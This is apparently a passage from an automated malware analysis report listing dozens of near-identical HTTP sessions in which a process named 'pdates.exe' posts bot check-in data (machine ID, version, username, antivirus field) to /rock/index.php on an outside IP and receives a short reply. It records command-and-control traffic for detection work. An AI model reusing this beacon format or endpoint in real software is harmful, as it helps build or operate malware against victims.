Jul 27, 2023 01:36:14.008773088 CEST	5885	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:14.057481050 CEST	5885	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:14 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
745	192.168.2.5	50467	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:14.231384993 CEST	5886	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:14.278984070 CEST	5886	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:14 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
746	192.168.2.5	50468	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:14.448090076 CEST	5887	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:14.497167110 CEST	5887	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:14 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
747	192.168.2.5	50469	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:14.660676956 CEST	5888	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:14.709516048 CEST	5888	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:14 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
748	192.168.2.5	50470	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:14.867324114 CEST	5888	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:14.916129112 CEST	5889	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:14 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
749	192.168.2.5	50471	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:15.080708027 CEST	5889	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:15.129879951 CEST	5890	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:15 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
75	192.168.2.5	49792	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:23.265599012 CEST	2919	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:23.313203096 CEST	2919	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
750	192.168.2.5	50472	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:15.289351940 CEST	5890	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:15.337184906 CEST	5891	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:15 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
751	192.168.2.5	50473	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:15.491673946 CEST	5891	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:15.539551020 CEST	5892	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:15 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
752	192.168.2.5	50474	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:15.697019100 CEST	5892	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:15.745979071 CEST	5893	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:15 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
753	192.168.2.5	50475	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:15.897147894 CEST	5893	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:15.945004940 CEST	5893	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:15 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
754	192.168.2.5	50476	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:16.107287884 CEST	5894	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:16.157027006 CEST	5894	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:16 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
755	192.168.2.5	50477	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:16.321224928 CEST	5895	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:16.370201111 CEST	5895	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:16 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
756	192.168.2.5	50478	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:16.545707941 CEST	5896	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:16.593344927 CEST	5896	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:16 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
757	192.168.2.5	50479	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:16.741348028 CEST	5897	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:16.790319920 CEST	5897	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:16 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
758	192.168.2.5	50480	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:17.011612892 CEST	5898	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:17.061142921 CEST	5898	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
759	192.168.2.5	50481	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:17.392575979 CEST	5899	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:17.442708969 CEST	5899	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
76	192.168.2.5	49793	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:23.687297106 CEST	2920	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:23.734842062 CEST	2920	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
760	192.168.2.5	50482	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:17.631989956 CEST	5900	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:17.679928064 CEST	5900	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
761	192.168.2.5	50483	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:18.350517988 CEST	5901	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:18.400531054 CEST	5901	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
762	192.168.2.5	50484	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:18.626300097 CEST	5902	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:18.674458981 CEST	5902	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
763	192.168.2.5	50485	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:18.845316887 CEST	5903	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:18.893070936 CEST	5903	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
764	192.168.2.5	50486	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:19.768069029 CEST	5904	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:19.816915035 CEST	5904	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:19 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
765	192.168.2.5	50487	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
